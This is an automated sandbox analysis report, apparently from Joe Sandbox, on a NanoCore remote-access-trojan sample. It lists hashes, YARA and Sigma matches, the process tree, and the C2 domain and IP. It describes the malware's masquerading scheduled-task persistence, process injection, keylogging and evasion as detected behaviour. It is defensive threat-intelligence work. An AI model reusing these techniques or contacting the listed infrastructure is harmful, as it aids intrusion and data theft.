Windows Analysis Report dAkJsQr7A9.exe

Overview

General Information

Sample Name: dAkJsQr7A9.exe
Analysis ID: 500960
MD5: b115228fe5e180f505c081aa829c1a86
SHA1: c242c6a90ae569e55ed6acdb5c765244f623b9b6
SHA256: a64c1b956bb79c5cfec594165a4ba37e9f695f8f83ec2b7bc2729d19c2598cd5
Tags: exe NanoCoreRAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Installs a raw input device (often for capturing keystrokes)
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Process Tree

  • System is w10x64
  • dAkJsQr7A9.exe (PID: 6308 cmdline: 'C:\Users\user\Desktop\dAkJsQr7A9.exe' MD5: B115228FE5E180F505C081AA829C1A86)
    • xmjk.pif (PID: 6660 cmdline: 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
      • RegSvcs.exe (PID: 5792 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
        • schtasks.exe (PID: 7124 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6760 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegSvcs.exe (PID: 6312 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • xmjk.pif (PID: 6848 cmdline: 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
  • dhcpmon.exe (PID: 7096 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • xmjk.pif (PID: 4356 cmdline: 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
    • RegSvcs.exe (PID: 5572 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 6420 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\31956653\Update.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • xmjk.pif (PID: 4608 cmdline: 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
    • xmjk.pif (PID: 3412 cmdline: 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
      • RegSvcs.exe (PID: 6788 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 6232 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xf9ed:$x1: NanoCore.ClientPluginHost
  • 0xfa2a:$x2: IClientNetworkHost
  • 0x1355d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
    00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
    • 0xf755:$a: NanoCore
    • 0xf765:$a: NanoCore
    • 0xf999:$a: NanoCore
    • 0xf9ad:$a: NanoCore
    • 0xf9ed:$a: NanoCore
    • 0xf7b4:$b: ClientPlugin
    • 0xf9b6:$b: ClientPlugin
    • 0xf9f6:$b: ClientPlugin
    • 0xf8db:$c: ProjectData
    • 0x102e2:$d: DESCrypto
    • 0x17cae:$e: KeepAlive
    • 0x15c9c:$g: LogClientMessage
    • 0x11e97:$i: get_Connected
    • 0x10618:$j: #=q
    • 0x10648:$j: #=q
    • 0x10664:$j: #=q
    • 0x10694:$j: #=q
    • 0x106b0:$j: #=q
    • 0x106cc:$j: #=q
    • 0x106fc:$j: #=q
    • 0x10718:$j: #=q
    00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
    • 0xf9dd:$x1: NanoCore.ClientPluginHost
    • 0x441e5:$x1: NanoCore.ClientPluginHost
    • 0xfa1a:$x2: IClientNetworkHost
    • 0x44222:$x2: IClientNetworkHost
    • 0x1354d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0x47d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      20.3.xmjk.pif.4d3c088.5.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      20.3.xmjk.pif.4d3c088.5.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      20.3.xmjk.pif.4d3c088.5.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
        20.3.xmjk.pif.4d3c088.5.raw.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
        • 0xfef5:$a: NanoCore
        • 0xff05:$a: NanoCore
        • 0x10139:$a: NanoCore
        • 0x1014d:$a: NanoCore
        • 0x1018d:$a: NanoCore
        • 0xff54:$b: ClientPlugin
        • 0x10156:$b: ClientPlugin
        • 0x10196:$b: ClientPlugin
        • 0x1007b:$c: ProjectData
        • 0x10a82:$d: DESCrypto
        • 0x1844e:$e: KeepAlive
        • 0x1643c:$g: LogClientMessage
        • 0x12637:$i: get_Connected
        • 0x10db8:$j: #=q
        • 0x10de8:$j: #=q
        • 0x10e04:$j: #=q
        • 0x10e34:$j: #=q
        • 0x10e50:$j: #=q
        • 0x10e6c:$j: #=q
        • 0x10e9c:$j: #=q
        • 0x10eb8:$j: #=q
        25.2.RegSvcs.exe.34d9650.3.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
        • 0x42a6:$x1: NanoCore.ClientPluginHost

        Sigma Overview

        AV Detection:

        Sigma detected: NanoCore
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud:

        Sigma detected: NanoCore
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        System Summary:

        Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
        Source: Process started, Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard, Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp, ParentImage: C:\Users\user\31956653\xmjk.pif, ParentProcessId: 6660, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792
        Sigma detected: Possible Applocker Bypass
        Source: Process started, Author: juju4, Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp, ParentImage: C:\Users\user\31956653\xmjk.pif, ParentProcessId: 6660, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792

        Stealing of Sensitive Information:

        Sigma detected: NanoCore
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality:

        Sigma detected: NanoCore
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Jbx Signature Overview

        AV Detection:

        Yara detected Nanocore RAT
        Multi AV Scanner detection for submitted file
        Source: dAkJsQr7A9.exe, ReversingLabs: Detection: 59%
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\31956653\xmjk.pif, Metadefender: Detection: 37%
        Source: C:\Users\user\31956653\xmjk.pif, ReversingLabs: Detection: 55%
        Machine Learning detection for sample
        Source: dAkJsQr7A9.exe, Joe Sandbox ML: detected
        Machine Learning detection for dropped file
        Source: C:\Users\user\31956653\xmjk.pif, Joe Sandbox ML: detected
        Source: 6.2.RegSvcs.exe.b00000.1.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.2.RegSvcs.exe.60b0000.11.unpack, Avira: Label: TR/NanoCore.fadte
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
        Source: dAkJsQr7A9.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: dAkJsQr7A9.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: dAkJsQr7A9.exe, 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
        Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000006.00000003.518192059.00000000013AE000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb, source: xmjk.pif, 00000004.00000003.359156674.0000000001329000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000003.448460705.0000000001378000.00000004.00000001.sdmp, RegSvcs.exe, 0000000A.00000002.365790263.0000000000692000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.370470971.00000000007F2000.00000002.00020000.sdmp, RegSvcs.exe, 00000019.00000000.393856282.00000000007F2000.00000002.00020000.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, RegSvcs.exe, 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, dhcpmon.exe, 0000000F.00000002.370470971.00000000007F2000.00000002.00020000.sdmp, RegSvcs.exe, 00000019.00000000.393856282.00000000007F2000.00000002.00020000.sdmp
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CAA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA2DF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CC9FD3 FindFirstFileExA,0_2_00CC9FD3
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CBAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBAFB9
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0042399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_0042399B
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0043BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0043BCB3
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_00442408 FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00442408
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0043280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0043280D
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_00421A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00421A73
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0043BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0043BF17
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_00442408 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00442408
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_00468877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,13_2_00468877
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0043280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_0043280D
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0042399B GetFileAttributesW,FindFirstFileW,FindClose,13_2_0042399B
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_00421A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00421A73
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0044CAE7 FindFirstFileW,FindNextFileW,FindClose,13_2_0044CAE7
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0043BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,13_2_0043BCB3
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0044DE7C FindFirstFileW,FindClose,13_2_0044DE7C
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0043BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_0043BF17

        Networking:

        Connects to many ports of the same IP (likely port scanning)
        Source: global traffic, TCP traffic: 185.19.85.175 ports 2,4,5,6,8,48562
        Uses dynamic DNS services
        Source: unknown, DNS query: name: strongodss.ddns.net
        Source: global traffic, TCP traffic: 192.168.2.3:49749 -> 185.19.85.175:48562
        Source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: xmjk.pif, 00000004.00000000.332849092.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 0000000D.00000000.366495909.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 00000014.00000000.372500694.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 00000016.00000000.390620091.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 0000001B.00000002.427944627.000000000049B000.00000002.00020000.sdmp, String found in binary or memory: http://www.onnodb.com/aetraymenuH(
        Source: unknown, DNS traffic detected: queries for: strongodss.ddns.net
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_00432285 InternetQueryDataAvailable,InternetReadFile,4_2_00432285
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_004342E1 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,PostMessageW,4_2_004342E1
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0044A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0044A0FC
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0045D8E9 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,13_2_0045D8E9
        Source: RegSvcs.exe, 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, Binary or memory string: RegisterRawInputDevices
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0046C7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_0046C7D6

        E-Banking Fraud:

        Yara detected Nanocore RAT

        Operating System Destruction:

        Protects its processes via BreakOnTermination flag
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: 01 00 00 00

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001F.00000002.440127421.0000000003E89000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
